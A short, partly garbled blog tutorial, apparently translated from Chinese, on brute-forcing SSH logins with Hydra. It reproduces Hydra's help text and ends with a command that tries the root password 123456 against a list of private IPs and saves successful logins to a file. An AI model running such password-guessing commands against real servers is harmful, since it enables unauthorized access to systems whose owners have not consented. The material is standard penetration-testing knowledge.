Use hydra for ssh blasting

Previously mentioned port scanner
we will get to scan ipthe output to the list after finishing hydrablasting
to obtain ipa list of saved as followsip.txt

192.168.0.100
192.168.0.99
192.168.0.33

We use the -h command to view the help documentation of hydra as follows

root@xxx:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

语法: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

参数选项:
    -R    修复之前使用的aborted/crashed session
	-S    执行SSL(Secure Socket Layer)连接
	-s    Port 使用非默认服务器端口而是其他端口时,指定其端口
	-l    Login 已经获取登录ID的情况下输入登录ID
	-L    FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)
	-p    Pass 已经获取登录密码的情况下输入登录密码
	-P    FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)
	-x    MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解
	-C    FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式
	-M    FILE指定实施并列攻击的文件服务器的目录文件
	-o    FILE以STDOUT的形式输出结果值
	-f    查找到第一个可以使用的ID和密码的时候停止破解
	-t    TASKS 指定并列连接数(默认值:16)
	-w    指定每个线程的回应时间(Waittime)(默认值:32秒)
	-4/6  指定IPv4/IPv6(默认值:IPv4)
	-v/-V 显示详细信息
	-U    查看服务器组件使用详情

ssh blasting module

hydra -l root -p 123456 -M ip.txt -o goods.txt -v ssh

Guess you like

Origin blog.csdn.net/a807719447/article/details/113114608